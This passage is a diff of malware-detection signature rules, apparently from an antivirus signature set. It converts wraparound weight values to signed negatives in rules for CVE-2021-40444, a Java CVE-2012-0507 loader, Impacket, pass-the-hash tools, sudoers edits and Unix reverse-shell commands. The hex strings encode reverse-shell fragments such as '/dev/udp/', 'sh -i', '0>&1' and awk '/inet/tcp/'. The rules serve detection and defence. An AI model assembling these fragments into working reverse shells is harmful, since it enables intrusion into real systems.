$a_00_5 = {53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 43 6f 6d 70 61 72 65 72 3c 4d 69 63 72 6f 73 6f 66 74 2e 53 6f 75 6e 64 65 72 2e 50 72 6f 74 6f 63 6f 6c 73 2e 46 72 61 6d 65 3e } //-100 System.Collections.Generic.IComparer<Microsoft.Sounder.Protocols.Frame>
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_00_4 & 1)*65436+(#a_00_5 & 1)*65436) >=3
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_00_4 & 1)*-100+(#a_00_5 & 1)*-100) >=3
|
||||
|
||||
}
|
||||
|
|
@ -5,23 +5,23 @@ rule Exploit_Win64_CVE-2021-40444_A{
|
|||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 00 00 } //2
|
||||
$a_00_1 = {69 00 6e 00 70 00 75 00 74 00 2e 00 64 00 6c 00 6c 00 } //65526 input.dll
|
||||
$a_00_2 = {20 00 50 00 72 00 69 00 6e 00 74 00 65 00 72 00 73 00 } //65526 Printers
|
||||
$a_00_3 = {20 00 53 00 59 00 53 00 54 00 45 00 4d 00 } //65526 SYSTEM
|
||||
$a_00_4 = {2f 00 6e 00 61 00 6d 00 65 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 } //65526 /name Microsoft.
|
||||
$a_00_5 = {5c 00 4b 00 65 00 79 00 70 00 61 00 64 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 } //65526 \KeypadControl.exe
|
||||
$a_00_6 = {20 00 64 00 65 00 73 00 6b 00 2e 00 63 00 70 00 6c 00 } //65526 desk.cpl
|
||||
$a_00_7 = {4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 5c 00 4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 53 00 68 00 61 00 72 00 69 00 6e 00 67 00 20 00 43 00 65 00 6e 00 74 00 65 00 72 00 } //65526 Network and Internet\Network and Sharing Center
|
||||
$a_00_8 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 inetcpl.cpl
|
||||
$a_00_9 = {74 00 69 00 6d 00 65 00 64 00 61 00 74 00 65 00 2e 00 63 00 70 00 6c 00 } //65526 timedate.cpl
|
||||
$a_00_10 = {69 00 6e 00 74 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 intl.cpl
|
||||
$a_00_11 = {6d 00 6d 00 73 00 79 00 73 00 2e 00 63 00 70 00 6c 00 } //65526 mmsys.cpl
|
||||
$a_00_12 = {4d 00 61 00 74 00 68 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 50 00 61 00 6e 00 65 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 MathControlPanel.cpl
|
||||
$a_00_13 = {61 00 70 00 70 00 77 00 69 00 7a 00 2e 00 63 00 70 00 6c 00 } //65526 appwiz.cpl
|
||||
$a_00_14 = {69 00 6d 00 65 00 69 00 70 00 2e 00 63 00 70 00 6c 00 } //65526 imeip.cpl
|
||||
$a_00_15 = {53 00 6f 00 75 00 6e 00 64 00 } //65526 Sound
|
||||
$a_02_16 = {63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 90 02 06 70 00 61 00 6e 00 65 00 6c 00 90 00 } //65526
|
||||
$a_00_1 = {69 00 6e 00 70 00 75 00 74 00 2e 00 64 00 6c 00 6c 00 } //-10 input.dll
|
||||
$a_00_2 = {20 00 50 00 72 00 69 00 6e 00 74 00 65 00 72 00 73 00 } //-10 Printers
|
||||
$a_00_3 = {20 00 53 00 59 00 53 00 54 00 45 00 4d 00 } //-10 SYSTEM
|
||||
$a_00_4 = {2f 00 6e 00 61 00 6d 00 65 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 } //-10 /name Microsoft.
|
||||
$a_00_5 = {5c 00 4b 00 65 00 79 00 70 00 61 00 64 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 } //-10 \KeypadControl.exe
|
||||
$a_00_6 = {20 00 64 00 65 00 73 00 6b 00 2e 00 63 00 70 00 6c 00 } //-10 desk.cpl
|
||||
$a_00_7 = {4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 5c 00 4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 53 00 68 00 61 00 72 00 69 00 6e 00 67 00 20 00 43 00 65 00 6e 00 74 00 65 00 72 00 } //-10 Network and Internet\Network and Sharing Center
|
||||
$a_00_8 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 inetcpl.cpl
|
||||
$a_00_9 = {74 00 69 00 6d 00 65 00 64 00 61 00 74 00 65 00 2e 00 63 00 70 00 6c 00 } //-10 timedate.cpl
|
||||
$a_00_10 = {69 00 6e 00 74 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 intl.cpl
|
||||
$a_00_11 = {6d 00 6d 00 73 00 79 00 73 00 2e 00 63 00 70 00 6c 00 } //-10 mmsys.cpl
|
||||
$a_00_12 = {4d 00 61 00 74 00 68 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 50 00 61 00 6e 00 65 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 MathControlPanel.cpl
|
||||
$a_00_13 = {61 00 70 00 70 00 77 00 69 00 7a 00 2e 00 63 00 70 00 6c 00 } //-10 appwiz.cpl
|
||||
$a_00_14 = {69 00 6d 00 65 00 69 00 70 00 2e 00 63 00 70 00 6c 00 } //-10 imeip.cpl
|
||||
$a_00_15 = {53 00 6f 00 75 00 6e 00 64 00 } //-10 Sound
|
||||
$a_02_16 = {63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 90 02 06 70 00 61 00 6e 00 65 00 6c 00 90 00 } //-10
|
||||
condition:
|
||||
((#a_00_0 & 1)*2+(#a_00_1 & 1)*65526+(#a_00_2 & 1)*65526+(#a_00_3 & 1)*65526+(#a_00_4 & 1)*65526+(#a_00_5 & 1)*65526+(#a_00_6 & 1)*65526+(#a_00_7 & 1)*65526+(#a_00_8 & 1)*65526+(#a_00_9 & 1)*65526+(#a_00_10 & 1)*65526+(#a_00_11 & 1)*65526+(#a_00_12 & 1)*65526+(#a_00_13 & 1)*65526+(#a_00_14 & 1)*65526+(#a_00_15 & 1)*65526+(#a_02_16 & 1)*65526) >=2
|
||||
((#a_00_0 & 1)*2+(#a_00_1 & 1)*-10+(#a_00_2 & 1)*-10+(#a_00_3 & 1)*-10+(#a_00_4 & 1)*-10+(#a_00_5 & 1)*-10+(#a_00_6 & 1)*-10+(#a_00_7 & 1)*-10+(#a_00_8 & 1)*-10+(#a_00_9 & 1)*-10+(#a_00_10 & 1)*-10+(#a_00_11 & 1)*-10+(#a_00_12 & 1)*-10+(#a_00_13 & 1)*-10+(#a_00_14 & 1)*-10+(#a_00_15 & 1)*-10+(#a_02_16 & 1)*-10) >=2
|
||||
|
||||
}
|
||||
|
|
@ -15,9 +15,9 @@ rule Exploit_WinNT_CVE-2012-0507_D_ldr{
|
|||
$a_01_8 = {2a b6 05 6c bc 4c 03 3d } //10
|
||||
$a_03_9 = {19 b7 3a 2a 12 90 01 01 03 90 01 01 be 19 b6 3a 90 00 } //10
|
||||
$a_01_10 = {6a 61 76 61 2f 6c 61 6e 67 2f 43 6c 61 73 73 4c 6f 61 64 65 72 } //4 java/lang/ClassLoader
|
||||
$a_01_11 = {2f 73 65 63 75 72 69 74 79 2f 70 72 6f 76 69 64 65 72 2f 50 6f 6c 69 63 79 } //65506 /security/provider/Policy
|
||||
$a_01_12 = {4a 45 54 50 6f 6c 69 63 79 5d 20 4a 45 54 50 6f 6c 69 63 79 20 3a 20 65 78 74 20 64 69 72 20 3a } //65506 JETPolicy] JETPolicy : ext dir :
|
||||
$a_01_11 = {2f 73 65 63 75 72 69 74 79 2f 70 72 6f 76 69 64 65 72 2f 50 6f 6c 69 63 79 } //-30 /security/provider/Policy
|
||||
$a_01_12 = {4a 45 54 50 6f 6c 69 63 79 5d 20 4a 45 54 50 6f 6c 69 63 79 20 3a 20 65 78 74 20 64 69 72 20 3a } //-30 JETPolicy] JETPolicy : ext dir :
|
||||
condition:
|
||||
((#a_01_0 & 1)*5+(#a_01_1 & 1)*5+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_03_4 & 1)*4+(#a_03_5 & 1)*4+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*10+(#a_03_9 & 1)*10+(#a_01_10 & 1)*4+(#a_01_11 & 1)*65506+(#a_01_12 & 1)*65506) >=34
|
||||
((#a_01_0 & 1)*5+(#a_01_1 & 1)*5+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_03_4 & 1)*4+(#a_03_5 & 1)*4+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*10+(#a_03_9 & 1)*10+(#a_01_10 & 1)*4+(#a_01_11 & 1)*-30+(#a_01_12 & 1)*-30) >=34
|
||||
|
||||
}
|
||||
|
|
@ -12,8 +12,8 @@ rule HackTool_Linux_Impacket_C{
|
|||
$a_00_5 = {70 00 73 00 65 00 78 00 65 00 63 00 2e 00 70 00 79 00 20 00 } //5 psexec.py
|
||||
$a_00_6 = {73 00 6d 00 62 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 70 00 79 00 20 00 } //5 smbclient.py
|
||||
$a_00_7 = {72 00 70 00 63 00 64 00 75 00 6d 00 70 00 2e 00 70 00 79 00 20 00 } //5 rpcdump.py
|
||||
$a_00_8 = {79 00 75 00 6d 00 20 00 } //65436 yum
|
||||
$a_00_8 = {79 00 75 00 6d 00 20 00 } //-100 yum
|
||||
condition:
|
||||
((#a_00_0 & 1)*50+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_00_8 & 1)*65436) >=55
|
||||
((#a_00_0 & 1)*50+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_00_8 & 1)*-100) >=55
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Linux_PthToolkitGen_F{
|
|||
description = "HackTool:Linux/PthToolkitGen.F,SIGNATURE_TYPE_CMDHSTR_EXT,06 00 06 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {70 00 79 00 74 00 68 00 6f 00 6e 00 } //65436 python
|
||||
$a_00_1 = {70 00 65 00 72 00 6c 00 } //65436 perl
|
||||
$a_00_0 = {70 00 79 00 74 00 68 00 6f 00 6e 00 } //-100 python
|
||||
$a_00_1 = {70 00 65 00 72 00 6c 00 } //-100 perl
|
||||
$a_02_2 = {2d 00 75 00 20 00 90 02 80 25 00 90 01 40 3a 00 90 01 40 20 00 90 00 } //1
|
||||
$a_02_3 = {2d 00 2d 00 75 00 73 00 65 00 72 00 3d 00 90 02 80 25 00 90 01 40 3a 00 90 01 40 20 00 90 00 } //1
|
||||
$a_00_4 = {2f 00 2f 00 } //5 //
|
||||
condition:
|
||||
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65436+(#a_02_2 & 1)*1+(#a_02_3 & 1)*1+(#a_00_4 & 1)*5) >=6
|
||||
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-100+(#a_02_2 & 1)*1+(#a_02_3 & 1)*1+(#a_00_4 & 1)*5) >=6
|
||||
|
||||
}
|
||||
|
|
@ -8,9 +8,9 @@ rule HackTool_Linux_SudoNoPassAttempt_A{
|
|||
$a_03_1 = {41 00 4c 00 4c 00 90 02 10 3d 00 90 00 } //1
|
||||
$a_03_2 = {4e 00 4f 00 50 00 41 00 53 00 53 00 57 00 44 00 3a 00 90 02 10 41 00 4c 00 4c 00 90 00 } //1
|
||||
$a_00_3 = {2f 00 65 00 74 00 63 00 2f 00 73 00 75 00 64 00 6f 00 65 00 72 00 73 00 } //1 /etc/sudoers
|
||||
$a_00_4 = {61 00 7a 00 75 00 72 00 65 00 5f 00 70 00 69 00 70 00 65 00 6c 00 69 00 6e 00 65 00 73 00 5f 00 73 00 75 00 64 00 6f 00 } //65526 azure_pipelines_sudo
|
||||
$a_00_5 = {77 00 69 00 6e 00 62 00 69 00 6e 00 64 00 } //65526 winbind
|
||||
$a_00_4 = {61 00 7a 00 75 00 72 00 65 00 5f 00 70 00 69 00 70 00 65 00 6c 00 69 00 6e 00 65 00 73 00 5f 00 73 00 75 00 64 00 6f 00 } //-10 azure_pipelines_sudo
|
||||
$a_00_5 = {77 00 69 00 6e 00 62 00 69 00 6e 00 64 00 } //-10 winbind
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65526+(#a_00_5 & 1)*65526) >=4
|
||||
((#a_00_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-10+(#a_00_5 & 1)*-10) >=4
|
||||
|
||||
}
|
||||
|
|
@ -7,10 +7,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_A{
|
|||
$a_00_0 = {77 00 68 00 69 00 6c 00 65 00 } //1 while
|
||||
$a_00_1 = {65 00 78 00 70 00 6f 00 72 00 74 00 } //1 export
|
||||
$a_02_2 = {65 00 76 00 61 00 6c 00 20 00 24 00 28 00 77 00 68 00 6f 00 69 00 73 00 20 00 2d 00 68 00 20 00 90 02 20 20 00 2d 00 70 00 90 00 } //10
|
||||
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=12
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=12
|
||||
|
||||
}
|
||||
|
|
@ -7,10 +7,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_C{
|
|||
$a_02_0 = {61 00 77 00 6b 00 20 00 42 00 45 00 47 00 49 00 4e 00 90 02 02 7b 00 90 00 } //10
|
||||
$a_00_1 = {2f 00 69 00 6e 00 65 00 74 00 2f 00 74 00 63 00 70 00 2f 00 30 00 2f 00 } //5 /inet/tcp/0/
|
||||
$a_00_2 = {2f 00 69 00 6e 00 65 00 74 00 2f 00 75 00 64 00 70 00 2f 00 30 00 2f 00 } //5 /inet/udp/0/
|
||||
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=15
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=15
|
||||
|
||||
}
|
||||
|
|
@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_D{
|
|||
$a_00_3 = {73 00 6f 00 63 00 6b 00 5f 00 73 00 74 00 72 00 65 00 61 00 6d 00 } //1 sock_stream
|
||||
$a_02_4 = {63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 90 02 01 28 00 90 02 01 28 00 90 02 50 29 00 90 00 } //1
|
||||
$a_00_5 = {6f 00 73 00 2e 00 64 00 75 00 70 00 32 00 } //1 os.dup2
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65456+(#a_00_7 & 1)*65456+(#a_00_8 & 1)*65456) >=24
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-80+(#a_00_7 & 1)*-80+(#a_00_8 & 1)*-80) >=24
|
||||
|
||||
}
|
||||
|
|
@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_E{
|
|||
$a_02_5 = {73 00 6f 00 63 00 6b 00 61 00 64 00 64 00 72 00 5f 00 69 00 6e 00 90 02 02 28 00 90 02 50 2c 00 90 00 } //1
|
||||
$a_00_6 = {69 00 6e 00 65 00 74 00 5f 00 61 00 74 00 6f 00 6e 00 } //1 inet_aton
|
||||
$a_00_7 = {6f 00 70 00 65 00 6e 00 } //1 open
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_02_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65456+(#a_00_9 & 1)*65456+(#a_00_10 & 1)*65456) >=26
|
||||
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_02_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-80+(#a_00_9 & 1)*-80+(#a_00_10 & 1)*-80) >=26
|
||||
|
||||
}
|
||||
|
|
@ -8,10 +8,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_F{
|
|||
$a_00_1 = {3e 00 26 00 20 00 2f 00 64 00 65 00 76 00 2f 00 75 00 64 00 70 00 2f 00 } //10 >& /dev/udp/
|
||||
$a_00_2 = {73 00 68 00 20 00 2d 00 69 00 } //1 sh -i
|
||||
$a_00_3 = {30 00 3e 00 26 00 31 00 } //1 0>&1
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=12
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=12
|
||||
|
||||
}
|
||||
|
|
@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_G{
|
|||
$a_02_3 = {73 00 6f 00 63 00 6b 00 61 00 64 00 64 00 72 00 5f 00 69 00 6e 00 90 02 02 28 00 90 02 50 2c 00 90 00 } //10
|
||||
$a_00_4 = {69 00 6e 00 65 00 74 00 5f 00 61 00 74 00 6f 00 6e 00 } //1 inet_aton
|
||||
$a_00_5 = {6f 00 70 00 65 00 6e 00 } //1 open
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65456+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65456) >=24
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-80+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-80) >=24
|
||||
|
||||
}
|
||||
|
|
@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_I{
|
|||
$a_00_3 = {65 00 78 00 65 00 63 00 } //1 exec
|
||||
$a_00_4 = {3c 00 26 00 } //1 <&
|
||||
$a_00_5 = {3e 00 26 00 } //1 >&
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_02_0 & 1)*2+(#a_02_1 & 1)*2+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486) >=15
|
||||
((#a_02_0 & 1)*2+(#a_02_1 & 1)*2+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50) >=15
|
||||
|
||||
}
|
||||
|
|
@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_J{
|
|||
$a_00_5 = {2d 00 72 00 73 00 6f 00 63 00 6b 00 65 00 74 00 } //1 -rsocket
|
||||
$a_00_6 = {2d 00 65 00 } //1 -e
|
||||
$a_00_7 = {2d 00 72 00 6f 00 70 00 65 00 6e 00 73 00 73 00 6c 00 } //1 -ropenssl
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
|
||||
condition:
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_02_2 & 1)*5+(#a_02_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=23
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_02_2 & 1)*5+(#a_02_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=23
|
||||
|
||||
}
|
||||
|
|
@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_K{
|
|||
$a_00_5 = {73 00 65 00 6e 00 64 00 } //1 send
|
||||
$a_00_6 = {63 00 6c 00 6f 00 73 00 65 00 } //1 close
|
||||
$a_00_7 = {2d 00 65 00 } //1 -e
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65476 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65476 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65476 0.0.0.0
|
||||
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-60 127.0.0.1
|
||||
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-60 localhost
|
||||
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-60 0.0.0.0
|
||||
condition:
|
||||
